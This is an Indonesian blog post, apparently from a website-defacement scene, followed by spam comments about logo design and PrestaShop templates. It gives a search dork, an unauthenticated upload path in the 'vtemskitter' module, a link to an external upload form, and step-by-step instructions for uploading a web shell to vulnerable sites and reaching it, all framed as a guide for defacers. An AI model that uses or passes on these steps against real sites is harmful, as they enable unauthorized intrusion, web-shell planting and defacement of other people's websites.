Dork : inurl:modules/vtemskitter/ ( Dork bisa dikembangin dengan otak imajinasimu )
Exploit : /modules/vtemskitter/uploadimage.php
CSRF online kami bawa dari Aweu404 , Tq Aweu404
https://www.my.aweu404.id/aw.php
Postname Isi dengan : userfile
Akses Shell : site.co.li/modules/vtemskitter/img/urfile
atau site.co.li/modules/vtemskitter/slides/urfile
Langkah :
1. Dorking , searchnya di images/gambar sajah
2. pilih salah satu gambar
3. masukan exploit di atas seperti : site.co.li/[path]/modules/vtemskitter/uploadimage.php
4. vuln ? di pojok bacaan error
5. masukkan site yg vuln tdi ke csrf , isi Postname dengan = userfile. kalo sudak klik Oke
6. upload shell ente , kalo sudah klik jos
7. akses file liat di atas
Cukup Segitu ajh , Postingan ini dibuat dengan sedemikian rupa :V
Having Deface All defacer ^_^
TTD : Fix404
![[NEWS] Situs Kabupaten Pandeglang Diretas](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRw8akpkI3oRKHMJfWPjKpwA-tt8WHGeSPZQeATMewdujU_mZWZd7-GYJ_xgln7iRlpgbb2ICQ67yxxIk4YtaQGpY8RMU86fsfkww8FoArMHPU0LZIbVA7wvfIFlPZ6y0XEsg77ivMhwg/s72-c/dwqdqqqwd.png)
Hello, Saya Pandu
Excellent script, I also put it on my site, greatly facilitated the work with files. Also I recommend to use ready-made optimized templates prestashop https://www.templatemonster.com/ru/prestashop-themes-type/, created for specific topics. For example, I use the prestashop design template and the picture is somewhat similar to such aggregators as 500mpx
ReplyDeleteI really appreciate this wonderful post that you have provided for us. I assure this would be beneficial for most of the people. logo design
ReplyDeleteIn the event that you are hoping to begin showcasing your business, at that point you ought to know about the genuine pivot time when you can have your logo. Regardless of whether you pick a major logo planning firm or an independent creator, you ought to be given the correct desires for your logo. logo design service
ReplyDelete